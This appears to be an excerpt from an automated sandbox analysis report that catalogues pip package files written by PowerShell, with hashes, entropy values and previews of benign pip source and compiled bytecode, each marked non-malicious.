                                                                                                                                                                                                              Preview:from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name..from pip._internal.req.constructors import install_req_drop_extras.from pip._internal.req.req_install import InstallRequirement..from .base import Candidate, CandidateLookup, Requirement, format_name...class ExplicitRequirement(Requirement):. def __init__(self, candidate: Candidate) -> None:. self.candidate = candidate.. def __str__(self) -> str:. return str(self.candidate).. def __repr__(self) -> str:. return f"{self.__class__.__name__}({self.candidate!r})".. @property. def project_name(self) -> NormalizedName:. # No need to canonicalize - the candidate did this. return self.candidate.project_name.. @property. def name(self) -> str:. # No need to canonicalize - the candidate did this. return self.candidate.name.. def format_for_error(self) -> str:. return self.candidate.forma
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12592
                                                                                                                                                                                                              Entropy (8bit):4.328792455404742
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:gN0R+Ax5l1HPLlZ/pS9DBFYcIaJbY0FRB314LCLbo2s8T4EBdvMuhz:gN0R+cLpS1BRxXX1BbYm4ydku9
                                                                                                                                                                                                              MD5:C966A718961B0E444857373050B09EE2
                                                                                                                                                                                                              SHA1:1FD155FCFA0A1547F514E35C4013A1C214E64D6D
                                                                                                                                                                                                              SHA-256:9CB24EB15304562DA0414549A1414A31901EBB67FB19132318CBCD496CB3D017
                                                                                                                                                                                                              SHA-512:AAFC4B6926C19AD425864209D0BD84EC4B8DA84EFDD9C08E8607D83B06603950E030E9833618375C3CEC50895512563B9C912DDD0E06F5FE751049A29C062190
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import contextlib.import functools.import logging.import os.from typing import TYPE_CHECKING, Dict, List, Optional, Set, Tuple, cast..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.resolvelib import BaseReporter, ResolutionImpossible.from pip._vendor.resolvelib import Resolver as RLResolver.from pip._vendor.resolvelib.structs import DirectedGraph..from pip._internal.cache import WheelCache.from pip._internal.index.package_finder import PackageFinder.from pip._internal.operations.prepare import RequirementPreparer.from pip._internal.req.constructors import install_req_extend_extras.from pip._internal.req.req_install import InstallRequirement.from pip._internal.req.req_set import RequirementSet.from pip._internal.resolution.base import BaseResolver, InstallRequirementProvider.from pip._internal.resolution.resolvelib.provider import PipProvider.from pip._internal.resolution.resolvelib.reporter import (. PipDebuggingReporter,. PipReporter,.).from pip._inte
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8378
                                                                                                                                                                                                              Entropy (8bit):4.5483528725345925
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:8A4VU/4+r8L9DC8PVjXC6gAiOlYNyT1mgC5tlyspvIIjN5U:8A4VU/PriPVjXC6xGT5tndnU
                                                                                                                                                                                                              MD5:CA21C210EFA5760DB395D16076E1ABE5
                                                                                                                                                                                                              SHA1:34B9904DA71D74F6EE47026974C5B4134789ABA4
                                                                                                                                                                                                              SHA-256:B1AC502C1F14CC816D31272ABB2B46D744CE4EC61514943F9A45B5358FB8EB01
                                                                                                                                                                                                              SHA-512:7F848DCFFF740A943A036D086571E0CD6979F08C293C92745770A40A5050343C3263ECD38E2E42EE16BEEA975A11BE6E0C8B0E61DEE8A7F35E207E3ED53E9A69
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import datetime.import functools.import hashlib.import json.import logging.import optparse.import os.path.import sys.from dataclasses import dataclass.from typing import Any, Callable, Dict, Optional..from pip._vendor.packaging.version import parse as parse_version.from pip._vendor.rich.console import Group.from pip._vendor.rich.markup import escape.from pip._vendor.rich.text import Text..from pip._internal.index.collector import LinkCollector.from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import get_default_environment.from pip._internal.metadata.base import DistributionVersion.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.network.session import PipSession.from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.entrypoints import (. get_best_invocation_for_this_pip,. get_best_invocation_for_this_python,.).from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_ow
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2424
                                                                                                                                                                                                              Entropy (8bit):5.092023765749065
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:WhCwnB0TGH3R2HgNC25maQ+vl+rylM96ibl9sEtjwjDjF81X:5w3Ggg2D0rqUjlwrF89
                                                                                                                                                                                                              MD5:FDA354BD6627DFFEA3098B674C34AB91
                                                                                                                                                                                                              SHA1:B430F71CAADBC77EDBE93D376A9E320C72E06DCC
                                                                                                                                                                                                              SHA-256:A349CA42AD0496CA026B96570FC0FC49F9A066A7C47D0DDBE1E351D38ADA66F1
                                                                                                                                                                                                              SHA-512:1214A354BB6DF60C5FEBEDD2B9BC81140C0ACF1EE714E3EA9B41C8995436FA8889DA50C30D02D68D3FC801748418A3295996A57BEF9C4A11AF3390076B6ABCFF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.d.d.e.d.e.d.e.f.d...Z.d.d.e.d.e.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.y.).z..This code wraps the vendored appdirs module to so the return values are.compatible for the current pip code base...The intention is to rewrite current usages gradually, keeping the tests pass,.and eventually drop this after all usages are changed.......N)...List)...platformdirs..appname..returnc.....................0.....t.........j...................|.d...........S.).NF)...appauthor)..._appdirs..user_cache_dir).r....s.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/appdirs.pyr....r........s..........."..".7.e..<..<.......roamingc...........................t.........j...................|.d.|...........}.t.........j...................j...................|.........r.|.S.d.}.|.r t.........j...................j...................|.|.........}.t.........j....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2227
                                                                                                                                                                                                              Entropy (8bit):5.37986917365391
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:VlnzFvqkHw266dm9HGIX8SySMmFW/2XHUx2:PzFvpHW6otG+sSMk4g
                                                                                                                                                                                                              MD5:3C42D632D6EC9014DA222A65D025B81F
                                                                                                                                                                                                              SHA1:B1AB83E361554604057A8783927D819A6DF04B09
                                                                                                                                                                                                              SHA-256:58F7E3BFB0197B7026EC2972D13F9615DB89AE5405BD3DB78847F19122B076EB
                                                                                                                                                                                                              SHA-512:D71C9C96189898D5A881AFC11E570F496FF1B94842B6FC424DC3904CE48B6BB4BFFA29EFC97026F1BEC6BB4D30F603334DEBF3E51BA1D652E3AF6DF3A1A4459F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e\...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z...e.j...................e.........Z.d.e.f.d...Z.d.e.d.e.f.d...Z.h.d...Z.e.j...................j...................d.........x.s ..e.j...................d.k(..x.r...e.j ..................d.k(..Z.y.).zKStuff that differs in different Python versions and platform.distributions......N)...get_path_uid..stdlib_pkgs..WINDOWS..returnc.....................<.......d.d.l.}.y.#.t.........$.r...Y.n.w.x.Y.w.d.d.l.m.}...|.S.).Nr....T)...IS_PYOPENSSL)..._ssl..ImportError..pip._vendor.urllib3.utilr....).r....r....s.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/compat.py..has_tlsr........s*......................................6......s..................pathc..........................t.........t.........d.........rkt.........j...................|.t.........j...................t.........j...................z...........}.t.........j...................|.........j....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5575
                                                                                                                                                                                                              Entropy (8bit):5.558195281592082
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:2kSlZqxswQLlOTO8E0pFBlfYs4PGOkI/c9XYwTV8KDglzCVD1:2dlkOt+O8E0pjBYCj8ceweKDkm1
                                                                                                                                                                                                              MD5:CCE2D48AFF4F1B3274C2B619B9AD0BC6
                                                                                                                                                                                                              SHA1:7CF9AB620FB5C68F8B44BDABBDA0E806D8292782
                                                                                                                                                                                                              SHA-256:38F7889ECAB651CBE687AB0E440E538296BA8D8432615CBECE7A6DE23D3FAF83
                                                                                                                                                                                                              SHA-512:988705B54B1EAD49AB148FF5ADECEA32C567612123E9981C7D3C1CEF3AF17815991A5F49FC0560668CE62F6841AFCAF4941B6AC195987C4AE883A9C88CE8D7FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................x.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.j...................d.........Z.d.e.e.d.f.....d.e.f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.e.e.........d.e.e.e.........f.d...Z.d.e.d.e.f.d...Z...d.d.e.e.....d.e.e.....d.e.f.d...Z.........d.d.e.e.....d.e.e.e.........d.e.e.....d.e.e.e.........d.e.e.....f.d...Z.y.).z3Generate and work with PEP 425 Compatibility Tags.......N)...List..Optional..Tuple)...PythonVersion..Tag..compatible_tags..cpython_tags..generic_tags..interpreter_name..interpreter_version..mac_platformsz.(.+)_(\d+)_(\d+)_(.+)..version_info...returnc.....................F.....d.j...................t.........t.........|.d.d...................S.).N.......)...join..map..str).r....s.... .zC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/compatibility_tags.py..version_info_to_nodotr........s..........7.7.3.s.L...!..,..-......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):698
                                                                                                                                                                                                              Entropy (8bit):5.111215846226838
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:9CHSB1aw8/Mdhg7OX2J/2ImbskqusF2pOYmPB0X+johDyU:9CH4aXUdAOmx23N4MEYmmX+chd
                                                                                                                                                                                                              MD5:4D52E2E3E3616C1E3BEC9284B3ACAB83
                                                                                                                                                                                                              SHA1:9D47D3FA12C90F9617596C2BB1ADD01AD4946949
                                                                                                                                                                                                              SHA-256:74F7ABBF87B39A54E44EF5F9C1B0948E35B9381D9C0BF6DA92348A1C5FCDE490
                                                                                                                                                                                                              SHA-512:B7A32B35B3A872641D8DB0BB98C42CE40043663D9B03A997FB14BBDA19FD43C720BEE45B2037C7628088873D1206802C6CA7EFD0B12F32433EF2F7E564CEF61E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................(.....d.Z.d.d.l.Z.d.e.d.e.d.e.d.e.f.d...Z.y.).z.For when pip wants to check the date or time.......N..year..month..day..returnc.....................v.....t.........j...................j...........................}.t.........j...................|.|.|.........}.|.|.kD..S.).N)...datetime..date..today).r....r....r....r......givens.... .pC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/datetime.py..today_is_later_thanr........s0.........M.M........!.E....M.M.$...s..+.E....5.=........)...__doc__r......int..boolr......r....r......<module>r........s0........................c......#......C......D.....r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4200
                                                                                                                                                                                                              Entropy (8bit):5.603099989773437
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:yIzinC7ITvgezuOCykDPEMUor6fmZVhnyxnJ1:yIGnCETv7zuOlctpVIxn/
                                                                                                                                                                                                              MD5:8E9B0AABD54DB43C2FA36A1C61749C46
                                                                                                                                                                                                              SHA1:9B5B6674ACC1FF06C44D7C197EC5EF78E724638C
                                                                                                                                                                                                              SHA-256:65B49DFE41FD73DEC32EE5F7BC03168D3CF3980F1635B8C5E51FC08D9BF53EF9
                                                                                                                                                                                                              SHA-512:62F448833C7D14E1799B191B6DE0A73B0E84A3077765591568CF068CC31A7D71C605F4837D4DF118E9F4FAC19329C679016EDFAE4D2BE45566201538AE85E119
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e+...............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z...G.d...d.e.........Z.d.a.e.e.d.<.......d.d.e.e.e.f.....d.e.e.....d.e.d.e.d.e.e.....d.e.e.....d.d.f.d...Z.d.d...Z.d.d.d...d.e.d.e.e.....d.e.e.....d.e.e.....d.e.e.....d.d.f.d...Z.y.).zN.A module that implements tooling to enable easy warnings about deprecations.......N)...Any..Optional..TextIO..Type..Union)...parse)...__version__z.DEPRECATION: c...........................e.Z.d.Z.y.)...PipDeprecationWarningN)...__name__..__module__..__qualname__........sC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/utils/deprecation.pyr....r........s.........r....r......_original_showwarning..message..category..filename..lineno..file..line..returnc...........................|...t...........t.........|.|.|.|.|.|...........y.y.t.........|.t.................r't.........j...................d.........}.|.j...................|...........y.t..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3567
                                                                                                                                                                                                              Entropy (8bit):5.0621027636596505
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:oinuZGc9ngI/x3+6xr2Oj1TCspWvLMuDUA2awcFTzLVbFplO3J7o72BJ:oYuN9n2fvNUfcFTzBbFyN
                                                                                                                                                                                                              MD5:8104587C5317C8959EC4085B944C18A2
                                                                                                                                                                                                              SHA1:B9247DED3E8C98250F0E01D1CF7C162897F8824F
                                                                                                                                                                                                              SHA-256:C7744B576BDBD16B475F37FCC7F3EAF6FE99F58574569D8AAD3FA4D6DB24B3BC
                                                                                                                                                                                                              SHA-512:F2A3A6A71AE960D5ED76AB62EE200344E6A5B1E50803CC22DCEE53BC3C0941F6A9973DFEAE52891E16CD10A9AD948DE251A88E6BA17666B601A38F689AC09AF6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z...d.d.e.d.e.e.....d.e.d.e.f.d...Z.y.)......)...Optional)...ArchiveInfo..DirectUrl..DirInfo..VcsInfo)...Link)...path_to_url)...vcs..direct_url..name..returnc..........................|.j.............................|.d.z...}.g.}.t.........|.j...................t.................rI|.d.j...................|.j...................j...................|.j...................|.j...................j...........................z...}.n.t.........|.j...................t.................rK|.|.j...................z...}.|.j...................j...................rQ|.j...................|.j...................j.............................n+t.........|.j...................t.................s.J...|.|.j...................z...}.|.j...................r.|.j...................d.|.j...................z.............|.r.|.d.d.j...................|.........z...z...}
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3240
                                                                                                                                                                                                              Entropy (8bit):5.366207157331062
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:OFGJ0OKVQtwrNSyKs62NPjIrQI4dMfqtpCY2/GBn/7Keutbj:OQJ0OKVQtwr7IrQI4dFS9
                                                                                                                                                                                                              MD5:9BE3E91E54CA383AB1BF9AEFB349C50A
                                                                                                                                                                                                              SHA1:BC240BF2B89BADE22B8D271815D7AAF6FF1D902A
                                                                                                                                                                                                              SHA-256:C9EA106C53AECCA703E67D843B7C6361D03A5383D50B0FCBAFCEE9DCAA22B30E
                                                                                                                                                                                                              SHA-512:F38255370C846CE92EDCF3B5B7AFD8C408179A3C9E36257B9F6B5E46E339A15B91F0503E1CFFC9F0719657BBAA7915F840C509669F6452C523FD545462BF833A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.g.Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....f.d...Z.y.)......N)...List..Optional)...site_packages..user_site)...running_under_virtualenv..virtualenv_no_global..egg_link_path_from_sys_path..egg_link_path_from_location..raw_name..returnc.....................@.....t.........j...................d.d.|.........d.z...|...d...g.S.).a..... Convert a Name metadata value to a .egg-link name, by applying. the same substitution as pkg_resources's safe_name function.. Note: we cannot use canonicalize_name because it has a different logic... We also look for the raw name (without normalization) as setuptools 69 changed. the way it names .egg-link files (https://github.com/pypa/setuptools/issues/4167).. z.[^A-Za-z0-9.]+..-z..egg-link)...re..sub).r....s.... .pC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_inter
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2169
                                                                                                                                                                                                              Entropy (8bit):5.414265328162387
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:z0x6hnllixcTsnqCGg3N3tF5wSy0/RkG8HuYPZx231ELpaXSmatlJy0HaTyJAKgp:z0qTUq8hp80+7T2ZSmc7iTyJAVo8oNI
                                                                                                                                                                                                              MD5:5FF5B48ED563A0134190BB7AD4DFC59B
                                                                                                                                                                                                              SHA1:2C0443049EFE884BB0004B1E348E1962917B5FE5
                                                                                                                                                                                                              SHA-256:6C46FA26E65524CD570A01184DF672FC04850F94830D62A8C97DC878FE75CF4C
                                                                                                                                                                                                              SHA-512:B11019CEAC763631E27855962A2CE48FFF9814366E38AC51F07ADF5A442A240CE9F9FFB22D443D9968AC4F7394B39BF28224A6CF026E8EB0A5E6FBCE596BA389
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e..........................>.....U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.e.j...................d.f.g.Z.e.e.e.e.f.........e.d.<.....e.j$..................d.........Z.d.e.d.e.f.d...Z.y.)......N)...List..Tuplez.utf-8z.utf-16z.utf-16-bez.utf-16-lez.utf-32z.utf-32-bez.utf-32-le..BOMSs....coding[:=]\s*([-\w.]+)..data..returnc...........................t.........D.]5..\...}.}.|.j...................|.........s...|.t.........|.........d...j...................|.........c...S...|.j...................d.........d.d...D.]n..}.|.d.d...d.k(..s...t.........j...................|.........s.."t.........j...................|.........}.|...J...|.j...........................d.....j...................d.........}.|.j...................|.........c...S...|.j...................t.........j...................d.........x.s...t.........j......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3351
                                                                                                                                                                                                              Entropy (8bit):5.085973629003143
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:JPQNssZQHToNQ7DtrqOMKk6A3TI/sDNzvHHlHm4s3a:yQHT7DtNk6OTIUDNhG4F
                                                                                                                                                                                                              MD5:AE014F7CBAEF31C8B32D369C3C6C3945
                                                                                                                                                                                                              SHA1:B0731381C5AED0A117E812350815008B0AC7623F
                                                                                                                                                                                                              SHA-256:CAF0C67A54D5BA045AC8F68E17693869BD0ACB8777B8E9007EE3908C04A32266
                                                                                                                                                                                                              SHA-512:D88BDAFA5DF9926DA4E9B2F877D48EDE1F04458808886C62CF1635E9488ECBC1905600BD50A62330AC7619327D9A1E152EA7BC00F29A688EBD7B980948E6922D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Functions brought over from jaraco.text...These functions are not supposed to be used within `pip._internal`. These are.helper functions brought over from `jaraco.text` to enable vendoring newer.copies of `pkg_resources` without having to vendor `jaraco.text` and its entire.dependency cone; something that our vendoring setup is not currently capable of.handling...License reproduced from original source below:..Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Softw
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1015
                                                                                                                                                                                                              Entropy (8bit):4.829282893843599
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:LbB2D68DIK03Bx2uOmcEYBoclg4I2KzY+3VkQyFyu91n5edNmGtz+LXsvKD2XXz9:Z2uK6/bhYlczV1qGzvvXXhuPs
                                                                                                                                                                                                              MD5:D525AEBD855B84182950CA3E13B6FD7A
                                                                                                                                                                                                              SHA1:2C20B7D739A304F3715AEA6B90EED634C2217C5F
                                                                                                                                                                                                              SHA-256:FA31CB384FD31DA673E4115C0A7A122FD11802D2749D77A6E3DB3DA1FE23BCAC
                                                                                                                                                                                                              SHA-512:46E30C99D22600897809EA272683DAD3251F1938FEA156DD087243C176C6277389B09F544869404BD6E807BB50285A6359B0B2301BE89AB285B175B6F52FE15F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Customize logging..Defines custom logger class for the `logger.verbose(...)` method...init_logging() must be called before any other modules that call logging.getLogger.."""..import logging.from typing import Any, cast..# custom log level for `--verbose` output.# between DEBUG and INFO.VERBOSE = 15...class VerboseLogger(logging.Logger):. """Custom Logger, defining a verbose log-level.. VERBOSE is between INFO and DEBUG.. """.. def verbose(self, msg: str, *args: Any, **kwargs: Any) -> None:. return self.log(VERBOSE, msg, *args, **kwargs)...def getLogger(name: str) -> VerboseLogger:. """logging.getLogger, but ensures our VerboseLogger class is returned""". return cast(VerboseLogger, logging.getLogger(name))...def init_logging() -> None:. """Register our VerboseLogger and VERBOSE log level... Should be called before any calls to getLogger(),. i.e. in pip._internal.__init__. """. logging.setLoggerClass(VerboseLogger). logging.addLevelName(VERBO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1665
                                                                                                                                                                                                              Entropy (8bit):4.720039128708989
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:xnB0TGLm/yMUR2o0vmQhaMf4ugRpS1Y9Ft5Xi:xrmqnRg5IMAugRpoY9F/i
                                                                                                                                                                                                              MD5:C165A5743C1F307CCCD2419071932098
                                                                                                                                                                                                              SHA1:2F7D46108F0818D083EC0FDEF4BEF65AC5977583
                                                                                                                                                                                                              SHA-256:B3081C4CA3A6DDD68B7974D6EAFE41512D938B646F1271914181FFC835E4940A
                                                                                                                                                                                                              SHA-512:855626248CC0F836F31E63FF01E9F4C09C9BD856A9CE160AF776A652EA791073569E773F8A0B57349659F1CE0BA0152112BE5D2CAEFB91D2EFC2DC576C4F8539
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:""".This code wraps the vendored appdirs module to so the return values are.compatible for the current pip code base...The intention is to rewrite current usages gradually, keeping the tests pass,.and eventually drop this after all usages are changed.."""..import os.import sys.from typing import List..from pip._vendor import platformdirs as _appdirs...def user_cache_dir(appname: str) -> str:. return _appdirs.user_cache_dir(appname, appauthor=False)...def _macos_user_config_dir(appname: str, roaming: bool = True) -> str:. # Use ~/Application Support/pip, if the directory exists.. path = _appdirs.user_data_dir(appname, appauthor=False, roaming=roaming). if os.path.isdir(path):. return path.. # Use a Linux-like ~/.config/pip, by default.. linux_like_path = "~/.config/". if appname:. linux_like_path = os.path.join(linux_like_path, appname).. return os.path.expanduser(linux_like_path)...def user_config_dir(appname: str, roaming: bool = True) -> str:.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1884
                                                                                                                                                                                                              Entropy (8bit):4.898660610096103
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:rqA9ydI6zdCdm9HG5FAY/Lne1MOoToPtIWL6wEv:rFX6zEotG5JyVosPt6Vv
                                                                                                                                                                                                              MD5:AF88D940B9DAABD00B97A3CF427B26E6
                                                                                                                                                                                                              SHA1:29D3D00672CB363BC71BDF0769EC4FE9841AE318
                                                                                                                                                                                                              SHA-256:002C817CB823DFF5C6FA2039A26103AD7A833347102B38BC87C1D10489F31BA4
                                                                                                                                                                                                              SHA-512:6A4B4E2A3037D259C6B388EDEA0E9BB615A6D69BBC4FEFF7B35527CD1740DAE2D99F42E1130813C87E78B2832AEF31634D2F965DD78E9C0CC55F6876424AF5D7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Stuff that differs in different Python versions and platform.distributions."""..import logging.import os.import sys..__all__ = ["get_path_uid", "stdlib_pkgs", "WINDOWS"]...logger = logging.getLogger(__name__)...def has_tls() -> bool:. try:. import _ssl # noqa: F401 # ignore unused.. return True. except ImportError:. pass.. from pip._vendor.urllib3.util import IS_PYOPENSSL.. return IS_PYOPENSSL...def get_path_uid(path: str) -> int:. """. Return path's uid... Does not follow symlinks:. https://github.com/pypa/pip/pull/935#discussion_r5307003.. Placed this function in compat due to differences on AIX and. Jython, that should eventually go away... :raises OSError: When path is a symlink or can't be read.. """. if hasattr(os, "O_NOFOLLOW"):. fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW). file_uid = os.fstat(fd).st_uid. os.close(fd). else: # AIX and Jython. # WARNING: time of check vulnerab
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5377
                                                                                                                                                                                                              Entropy (8bit):4.623716321322792
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:wcBTxRtuL5CUowd1J+GQfP2qJ25Lv+ENJADraBcUchJFoHcmjfXYMXcvrO:HFxDuL5EkjoGqs5pAD2D1H/ADrO
                                                                                                                                                                                                              MD5:964CA22D0609D7722001D792568DAF84
                                                                                                                                                                                                              SHA1:DFBADA13EBA8EF63D4BC33A652ADA480E3E06B42
                                                                                                                                                                                                              SHA-256:C9D8A7F101BC047A9846C3D8E0E2FA7266F8E026EA5E5D53D31C52F7B5611E49
                                                                                                                                                                                                              SHA-512:AA278E6157336DA7DC24A60F7E50376C2BAE4F919B828CBF325457935A26A4CCD9F014B32779D5A98CE4C78B64F85B70FD2D07AA233565AF53D5E0CCC537F837
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Generate and work with PEP 425 Compatibility Tags.."""..import re.from typing import List, Optional, Tuple..from pip._vendor.packaging.tags import (. PythonVersion,. Tag,. compatible_tags,. cpython_tags,. generic_tags,. interpreter_name,. interpreter_version,. mac_platforms,.).._osx_arch_pat = re.compile(r"(.+)_(\d+)_(\d+)_(.+)")...def version_info_to_nodot(version_info: Tuple[int, ...]) -> str:. # Only use up to the first two numbers.. return "".join(map(str, version_info[:2]))...def _mac_platforms(arch: str) -> List[str]:. match = _osx_arch_pat.match(arch). if match:. name, major, minor, actual_arch = match.groups(). mac_version = (int(major), int(minor)). arches = [. # Since we have always only checked that the platform starts. # with "macosx", for backwards-compatibility we extract the. # actual prefix provided by the user in case they provided. # something like "macosxcustom_".
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):242
                                                                                                                                                                                                              Entropy (8bit):4.397332469335865
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:tj57fw86Cx/McP81xqwXJhA7p8BsjD7QpCJbhy9/oXEcvg:P086CxH8+gW7p8qD0pCJFo/oFY
